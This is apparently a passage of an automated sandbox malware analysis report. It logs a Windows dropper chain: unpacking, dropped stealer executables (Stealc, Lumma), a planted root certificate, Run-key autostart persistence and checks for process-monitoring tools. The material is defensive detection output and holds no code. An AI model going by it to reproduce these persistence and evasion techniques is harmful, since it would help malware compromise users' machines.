                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: scrrun.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textshaping.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textinputframework.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                    Source: file.exeStatic file information: File size 1936896 > 1048576
                                    Source: file.exeStatic PE information: Raw size of nkxohnek is bigger than: 0x100000 < 0x1a7400
                                    Source: Binary string: .pdb8 source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: rolsroice.pdb source: 66ed86be077bb_12.exe.27.dr
                                    Source: Binary string: rolsroice.pdbX source: 66ed86be077bb_12.exe.27.dr

                                    Data Obfuscation

                                    barindex
                                    Detected unpacking (changes PE section rights)
                                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 6.2.file.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 8.2.skotes.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 11.2.skotes.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeUnpacked PE file: 13.2.3ec4738210.exe.200000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeUnpacked PE file: 14.2.b74664dd7e.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeUnpacked PE file: 15.2.3ec4738210.exe.200000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeUnpacked PE file: 19.2.b74664dd7e.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeUnpacked PE file: 23.2.610cd559ac.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeUnpacked PE file: 26.2.3ec4738210.exe.200000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 27.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 28.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeUnpacked PE file: 29.2.b74664dd7e.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 30.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 41.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
                                    .NET source code contains potential unpacker
                                    Source: acentric[1].exe.27.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                                    Source: acentric.exe.27.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                                    Source: penis[1].exe.27.drStatic PE information: 0xDE289906 [Mon Feb 9 22:02:46 2088 UTC]
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,17_2_00DF42DE
                                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                    Source: crypted.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x52b78
                                    Source: 3ec4738210.exe.11.drStatic PE information: real checksum: 0x1c4436 should be: 0x1cedfa
                                    Source: axplong.exe.23.drStatic PE information: real checksum: 0x1d3e08 should be: 0x1cbc28
                                    Source: random[2].exe.27.drStatic PE information: real checksum: 0x1c4436 should be: 0x1cedfa
                                    Source: acentric[1].exe.27.drStatic PE information: real checksum: 0x0 should be: 0x76faf
                                    Source: random[1].exe0.11.drStatic PE information: real checksum: 0x1d3e08 should be: 0x1cbc28
                                    Source: LummaC222222.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x5afcb
                                    Source: skotes.exe.6.drStatic PE information: real checksum: 0x1daa53 should be: 0x1dfca5
                                    Source: random[1].exe1.11.drStatic PE information: real checksum: 0x1c4436 should be: 0x1cedfa
                                    Source: LummaC222222[1].exe.27.drStatic PE information: real checksum: 0x0 should be: 0x5afcb
                                    Source: b74664dd7e.exe.11.drStatic PE information: real checksum: 0x1c4436 should be: 0x1cedfa
                                    Source: crypted[1].exe.27.drStatic PE information: real checksum: 0x0 should be: 0x52b78
                                    Source: stealc_default2[1].exe.27.drStatic PE information: real checksum: 0x0 should be: 0x31181
                                    Source: 2.exe.27.drStatic PE information: real checksum: 0x0 should be: 0xae761
                                    Source: penis[1].exe.27.drStatic PE information: real checksum: 0x0 should be: 0x863c1
                                    Source: 2[1].exe.27.drStatic PE information: real checksum: 0x0 should be: 0xae761
                                    Source: needmoney[1].exe.27.drStatic PE information: real checksum: 0x0 should be: 0x417a7a
                                    Source: acentric.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x76faf
                                    Source: 610cd559ac.exe.11.drStatic PE information: real checksum: 0x1d3e08 should be: 0x1cbc28
                                    Source: stealc_default2.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x31181
                                    Source: file.exeStatic PE information: real checksum: 0x1daa53 should be: 0x1dfca5
                                    Source: 4d72d15151.exe.27.drStatic PE information: real checksum: 0x1c4436 should be: 0x1cedfa
                                    Source: file.exeStatic PE information: section name:
                                    Source: file.exeStatic PE information: section name: .idata
                                    Source: file.exeStatic PE information: section name:
                                    Source: file.exeStatic PE information: section name: nkxohnek
                                    Source: file.exeStatic PE information: section name: drssptxt
                                    Source: file.exeStatic PE information: section name: .taggant
                                    Source: skotes.exe.6.drStatic PE information: section name:
                                    Source: skotes.exe.6.drStatic PE information: section name: .idata
                                    Source: skotes.exe.6.drStatic PE information: section name:
                                    Source: skotes.exe.6.drStatic PE information: section name: nkxohnek
                                    Source: skotes.exe.6.drStatic PE information: section name: drssptxt
                                    Source: skotes.exe.6.drStatic PE information: section name: .taggant
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name:
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name: .rsrc
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name: .idata
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name:
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name: fcorzhao
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name: ykxfeacd
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name: .taggant
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name:
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name: .rsrc
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name: .idata
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name:
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name: fcorzhao
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name: ykxfeacd
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name: .taggant
                                    Source: random[1].exe0.11.drStatic PE information: section name:
                                    Source: random[1].exe0.11.drStatic PE information: section name: .idata
                                    Source: random[1].exe0.11.drStatic PE information: section name:
                                    Source: random[1].exe0.11.drStatic PE information: section name: qnrefdmv
                                    Source: random[1].exe0.11.drStatic PE information: section name: gekfttam
                                    Source: random[1].exe0.11.drStatic PE information: section name: .taggant
                                    Source: random[1].exe1.11.drStatic PE information: section name:
                                    Source: random[1].exe1.11.drStatic PE information: section name: .rsrc
                                    Source: random[1].exe1.11.drStatic PE information: section name: .idata
                                    Source: random[1].exe1.11.drStatic PE information: section name:
                                    Source: random[1].exe1.11.drStatic PE information: section name: fcorzhao
                                    Source: random[1].exe1.11.drStatic PE information: section name: ykxfeacd
                                    Source: random[1].exe1.11.drStatic PE information: section name: .taggant
                                    Source: 610cd559ac.exe.11.drStatic PE information: section name:
                                    Source: 610cd559ac.exe.11.drStatic PE information: section name: .idata
                                    Source: 610cd559ac.exe.11.drStatic PE information: section name:
                                    Source: 610cd559ac.exe.11.drStatic PE information: section name: qnrefdmv
                                    Source: 610cd559ac.exe.11.drStatic PE information: section name: gekfttam
                                    Source: 610cd559ac.exe.11.drStatic PE information: section name: .taggant
                                    Source: axplong.exe.23.drStatic PE information: section name:
                                    Source: axplong.exe.23.drStatic PE information: section name: .idata
                                    Source: axplong.exe.23.drStatic PE information: section name:
                                    Source: axplong.exe.23.drStatic PE information: section name: qnrefdmv
                                    Source: axplong.exe.23.drStatic PE information: section name: gekfttam
                                    Source: axplong.exe.23.drStatic PE information: section name: .taggant
                                    Source: random[2].exe.27.drStatic PE information: section name:
                                    Source: random[2].exe.27.drStatic PE information: section name: .rsrc
                                    Source: random[2].exe.27.drStatic PE information: section name: .idata
                                    Source: random[2].exe.27.drStatic PE information: section name:
                                    Source: random[2].exe.27.drStatic PE information: section name: fcorzhao
                                    Source: random[2].exe.27.drStatic PE information: section name: ykxfeacd
                                    Source: random[2].exe.27.drStatic PE information: section name: .taggant
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name:
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name: .rsrc
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name: .idata
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name:
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name: fcorzhao
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name: ykxfeacd
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name: .taggant
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DCD91C push ecx; ret 11_2_00DCD92F
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E10A76 push ecx; ret 17_2_00E10A89
                                    Source: file.exeStatic PE information: section name: entropy: 7.982641711189707
                                    Source: file.exeStatic PE information: section name: nkxohnek entropy: 7.953823653253661
                                    Source: skotes.exe.6.drStatic PE information: section name: entropy: 7.982641711189707
                                    Source: skotes.exe.6.drStatic PE information: section name: nkxohnek entropy: 7.953823653253661
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name: fcorzhao entropy: 7.953583099269891
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name: fcorzhao entropy: 7.953583099269891
                                    Source: random[1].exe0.11.drStatic PE information: section name: entropy: 7.9824800968412175
                                    Source: random[1].exe0.11.drStatic PE information: section name: qnrefdmv entropy: 7.954647787076299
                                    Source: random[1].exe1.11.drStatic PE information: section name: fcorzhao entropy: 7.953583099269891
                                    Source: 610cd559ac.exe.11.drStatic PE information: section name: entropy: 7.9824800968412175
                                    Source: 610cd559ac.exe.11.drStatic PE information: section name: qnrefdmv entropy: 7.954647787076299
                                    Source: axplong.exe.23.drStatic PE information: section name: entropy: 7.9824800968412175
                                    Source: axplong.exe.23.drStatic PE information: section name: qnrefdmv entropy: 7.954647787076299
                                    Source: 2[1].exe.27.drStatic PE information: section name: .text entropy: 6.8715374332529295
                                    Source: 2.exe.27.drStatic PE information: section name: .text entropy: 6.8715374332529295
                                    Source: crypted[1].exe.27.drStatic PE information: section name: .text entropy: 7.994735225546955
                                    Source: crypted.exe.27.drStatic PE information: section name: .text entropy: 7.994735225546955
                                    Source: random[2].exe.27.drStatic PE information: section name: fcorzhao entropy: 7.953583099269891
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name: fcorzhao entropy: 7.953583099269891

                                    Persistence and Installation Behavior

                                    barindex
                                    Installs new ROOT certificates
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000285001\2.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\1000015002\b74664dd7e.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000308001\4d72d15151.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000321001\2.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exeJump to dropped file
                                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\2[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exeJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates multiple autostart registry keys
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b74664dd7e.exeJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d72d15151.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exeJump to behavior
                                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: RegmonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: FilemonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: RegmonclassJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: FilemonclassJump to behavior
